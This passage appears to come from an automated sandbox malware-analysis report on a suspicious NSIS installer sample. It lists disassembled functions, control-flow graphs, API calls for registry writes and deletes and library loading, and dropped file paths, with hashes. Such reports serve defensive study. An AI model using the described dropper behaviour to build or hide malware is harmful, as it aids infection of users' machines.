                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\004552024107.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-1336631294
                                            • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                            • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 451 406320-40632b 452 40632d-40633c 451->452 453 40633e-406353 451->453 452->453 454 406564-406568 453->454 455 406359-406364 453->455 456 406376-406380 454->456 457 40656e-406578 454->457 455->454 458 40636a-406371 455->458 456->457 461 406386-40638d 456->461 459 406583-406584 457->459 460 40657a-40657e call 40628d 457->460 458->454 460->459 463 406393-4063c9 461->463 464 406557 461->464 465 406501-406504 463->465 466 4063cf-4063d9 463->466 467 406561-406563 464->467 468 406559-40655f 464->468 469 406534-406537 465->469 470 406506-406509 465->470 471 4063f6 466->471 472 4063db-4063e4 466->472 467->454 468->454 476 406545-406555 lstrlenA 469->476 477 406539-406540 call 406320 469->477 474 406519-406525 call 40628d 470->474 475 40650b-406517 call 4061eb 470->475 473 4063fd-406405 471->473 472->471 478 4063e6-4063e9 472->478 479 406407 473->479 480 40640e-406410 473->480 488 40652a-406530 474->488 475->488 476->454 477->476 478->471 484 4063eb-4063ee 478->484 479->480 485 406412-40642d call 406174 480->485 486 406447-40644a 480->486 484->471 489 4063f0-4063f4 484->489 494 406432-406435 485->494 492 40644c-406458 GetSystemDirectoryA 486->492 493 40645d-406460 486->493 488->476 491 406532 488->491 489->473 495 4064f9-4064ff call 406587 491->495 496 4064e3-4064e6 492->496 497 406471-406474 493->497 498 406462-40646e GetWindowsDirectoryA 493->498 499 4064e8-4064ec 494->499 500 40643b-406442 call 406320 494->500 495->476 496->495 496->499 497->496 502 406476-406494 497->502 498->497 499->495 504 4064ee-4064f4 lstrcatA 499->504 500->496 506 406496-406499 502->506 507 4064ab-4064c3 call 4066b5 502->507 504->495 506->507 508 40649b-40649f 506->508 514 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 507->514 515 4064da-4064e1 507->515 512 4064a7-4064a9 508->512 512->496 512->507 514->496 514->515 515->496 515->502
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406452
                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00000000), ref: 00406468
                                            • SHGetPathFromIDListA.SHELL32(00000000,Call,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000), ref: 004064C7
                                            • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000), ref: 004064D0
                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000), ref: 004064F4
                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00000000,00424440,76D523A0), ref: 00406546
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                            • String ID: T@$79~$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 4024019347-3109083211
                                            • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                            • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                            • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                            • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 806 40177e-4017a1 call 402c5e call 405c8c 811 4017a3-4017a9 call 40628d 806->811 812 4017ab-4017bd call 40628d call 405c1f lstrcatA 806->812 817 4017c2-4017c8 call 406587 811->817 812->817 822 4017cd-4017d1 817->822 823 4017d3-4017dd call 406620 822->823 824 401804-401807 822->824 831 4017ef-401801 823->831 832 4017df-4017ed CompareFileTime 823->832 826 401809-40180a call 405dfb 824->826 827 40180f-40182b call 405e20 824->827 826->827 834 4018a3-4018cc call 4053d1 call 403168 827->834 835 40182d-401830 827->835 831->824 832->831 849 4018d4-4018e0 SetFileTime 834->849 850 4018ce-4018d2 834->850 836 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 835->836 837 401885-40188f call 4053d1 835->837 836->822 871 40187a-40187b 836->871 847 401898-40189e 837->847 851 402af3 847->851 853 4018e6-4018f1 FindCloseChangeNotification 849->853 850->849 850->853 855 402af5-402af9 851->855 856 4018f7-4018fa 853->856 857 402aea-402aed 853->857 859 4018fc-40190d call 406320 lstrcatA 856->859 860 40190f-401912 call 406320 856->860 857->851 864 401917-4023af 859->864 860->864 869 4023b4-4023b9 864->869 870 4023af call 4059a3 864->870 869->855 870->869 871->847 872 40187d-40187e 871->872 872->837
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11,00000000,00000000,00000031), ref: 004017BD
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11,00000000,00000000,00000031), ref: 004017E7
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,prophetess Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj7426.tmp$C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11$Call
                                            • API String ID: 1941528284-2991588994
                                            • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                            • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                            • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                            • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 873 4053d1-4053e6 874 40549c-4054a0 873->874 875 4053ec-4053fe 873->875 876 405400-405404 call 406320 875->876 877 405409-405415 lstrlenA 875->877 876->877 879 405432-405436 877->879 880 405417-405427 lstrlenA 877->880 882 405445-405449 879->882 883 405438-40543f SetWindowTextA 879->883 880->874 881 405429-40542d lstrcatA 880->881 881->879 884 40544b-40548d SendMessageA * 3 882->884 885 40548f-405491 882->885 883->882 884->885 885->874 886 405493-405496 885->886 886->874
                                            APIs
                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                            • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0), ref: 0040542D
                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll), ref: 0040543F
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll
                                            • API String ID: 2531174081-1915037644
                                            • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                            • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                            • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                            • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 887 403168-40317c 888 403185-40318e 887->888 889 40317e 887->889 890 403190 888->890 891 403197-40319c 888->891 889->888 890->891 892 4031ac-4031b9 call 40337a 891->892 893 40319e-4031a7 call 403390 891->893 897 403368 892->897 898 4031bf-4031c3 892->898 893->892 899 40336a-40336b 897->899 900 403313-403315 898->900 901 4031c9-403212 GetTickCount 898->901 904 403373-403377 899->904 902 403355-403358 900->902 903 403317-40331a 900->903 905 403370 901->905 906 403218-403220 901->906 907 40335a 902->907 908 40335d-403366 call 40337a 902->908 903->905 909 40331c 903->909 905->904 910 403222 906->910 911 403225-403233 call 40337a 906->911 907->908 908->897 919 40336d 908->919 913 40331f-403325 909->913 910->911 911->897 921 403239-403242 911->921 916 403327 913->916 917 403329-403337 call 40337a 913->917 916->917 917->897 924 403339-403345 call 405ec7 917->924 919->905 923 403248-403268 call 4067da 921->923 929 40330b-40330d 923->929 930 40326e-403281 GetTickCount 923->930 933 403347-403351 924->933 934 40330f-403311 924->934 929->899 931 403283-40328b 930->931 932 4032c6-4032c8 930->932 935 403293-4032be MulDiv wsprintfA call 4053d1 931->935 936 40328d-403291 931->936 937 4032ca-4032ce 932->937 938 4032ff-403303 932->938 933->913 939 403353 933->939 934->899 944 4032c3 935->944 936->932 936->935 941 4032d0-4032d7 call 405ec7 937->941 942 4032e5-4032f0 937->942 938->906 943 403309 938->943 939->905 947 4032dc-4032de 941->947 946 4032f3-4032f7 942->946 943->905 944->932 946->923 948 4032fd 946->948 947->934 949 4032e0-4032e3 947->949 948->905 949->946
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%$@DB
                                            • API String ID: 551687249-1316549817
                                            • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                            • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                            • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                            • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 950 406647-406667 GetSystemDirectoryA 951 406669 950->951 952 40666b-40666d 950->952 951->952 953 40667d-40667f 952->953 954 40666f-406677 952->954 956 406680-4066b2 wsprintfA LoadLibraryExA 953->956 954->953 955 406679-40667b 954->955 955->956
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                            • wsprintfA.USER32 ref: 00406697
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                            • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 957 402d60-402d89 call 406113 959 402d8e-402d92 957->959 960 402e43-402e47 959->960 961 402d98-402d9c 959->961 962 402dc1-402dd4 961->962 963 402d9e-402dbf RegEnumValueA 961->963 965 402dfd-402e04 RegEnumKeyA 962->965 963->962 964 402e28-402e36 RegCloseKey 963->964 964->960 966 402dd6-402dd8 965->966 967 402e06-402e18 RegCloseKey call 4066b5 965->967 966->964 968 402dda-402dee call 402d60 966->968 972 402e38-402e3e 967->972 973 402e1a-402e26 RegDeleteKeyA 967->973 968->967 975 402df0-402dfc 968->975 972->960 973->960 975->965
                                            APIs
                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                            • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 976 6d0e176b-6d0e17a7 call 6d0e1b28 980 6d0e17ad-6d0e17b1 976->980 981 6d0e18c4-6d0e18c6 976->981 982 6d0e17ba-6d0e17c7 call 6d0e2381 980->982 983 6d0e17b3-6d0e17b9 call 6d0e233f 980->983 988 6d0e17c9-6d0e17ce 982->988 989 6d0e17f7-6d0e17fe 982->989 983->982 992 6d0e17e9-6d0e17ec 988->992 993 6d0e17d0-6d0e17d1 988->993 990 6d0e181e-6d0e1822 989->990 991 6d0e1800-6d0e181c call 6d0e2568 call 6d0e15e9 call 6d0e12f6 GlobalFree 989->991 998 6d0e186c-6d0e1872 call 6d0e2568 990->998 999 6d0e1824-6d0e186a call 6d0e15fb call 6d0e2568 990->999 1015 6d0e1873-6d0e1877 991->1015 992->989 994 6d0e17ee-6d0e17ef call 6d0e2d53 992->994 996 6d0e17d9-6d0e17da call 6d0e2ac8 993->996 997 6d0e17d3-6d0e17d4 993->997 1007 6d0e17f4 994->1007 1010 6d0e17df 996->1010 1003 6d0e17d6-6d0e17d7 997->1003 1004 6d0e17e1-6d0e17e7 call 6d0e2742 997->1004 998->1015 999->1015 1003->989 1003->996 1014 6d0e17f6 1004->1014 1007->1014 1010->1007 1014->989 1019 6d0e1879-6d0e1887 call 6d0e252e 1015->1019 1020 6d0e18b4-6d0e18bb 1015->1020 1026 6d0e189f-6d0e18a6 1019->1026 1027 6d0e1889-6d0e188c 1019->1027 1020->981 1022 6d0e18bd-6d0e18be GlobalFree 1020->1022 1022->981 1026->1020 1029 6d0e18a8-6d0e18b3 call 6d0e1572 1026->1029 1027->1026 1028 6d0e188e-6d0e1896 1027->1028 1028->1026 1030 6d0e1898-6d0e1899 FreeLibrary 1028->1030 1029->1020 1030->1026
                                            APIs
                                              • Part of subcall function 6D0E1B28: GlobalFree.KERNEL32(?), ref: 6D0E1D99
                                              • Part of subcall function 6D0E1B28: GlobalFree.KERNEL32(?), ref: 6D0E1D9E
                                              • Part of subcall function 6D0E1B28: GlobalFree.KERNEL32(?), ref: 6D0E1DA3
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E1816
                                            • FreeLibrary.KERNEL32(?), ref: 6D0E1899
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E18BE
                                              • Part of subcall function 6D0E233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6D0E2370
                                              • Part of subcall function 6D0E2742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6D0E17E7,00000000), ref: 6D0E2812
                                              • Part of subcall function 6D0E15FB: wsprintfA.USER32 ref: 6D0E1629
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                            • String ID:
                                            • API String ID: 3962662361-3916222277
                                            • Opcode ID: 98636d1aaf521469376d92c5fc6d237fcc3bfc2cbff5e7eff9bb3ade7e4354fd
                                            • Instruction ID: dd466c0fa65a8e4a6bb6a5994ca81f070fb1fe4690e8526e205475245b4a4964
                                            • Opcode Fuzzy Hash: 98636d1aaf521469376d92c5fc6d237fcc3bfc2cbff5e7eff9bb3ade7e4354fd
                                            • Instruction Fuzzy Hash: 8741B272504206DEFB009F74CD84BAA37F8FF05798F048475EA599B086DB74C545CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1033 4024a3-4024ca call 402c5e * 2 call 402cee 1039 4024cf-4024d4 1033->1039 1040 402aea-402af9 1039->1040 1041 4024da-4024e4 1039->1041 1043 4024f4-4024f7 1041->1043 1044 4024e6-4024f3 call 402c5e lstrlenA 1041->1044 1047 4024f9-40250d call 402c3c 1043->1047 1048 40250e-402511 1043->1048 1044->1043 1047->1048 1049 402522-402536 RegSetValueExA 1048->1049 1050 402513-40251d call 403168 1048->1050 1054 402538 1049->1054 1055 40253b-402618 RegCloseKey 1049->1055 1050->1049 1054->1055 1055->1040
                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000023,00000011,00000002), ref: 004024EE
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,00000011,00000002), ref: 0040252E
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,00000011,00000002), ref: 00402612
                                            Strings
                                            Memory Dump Source
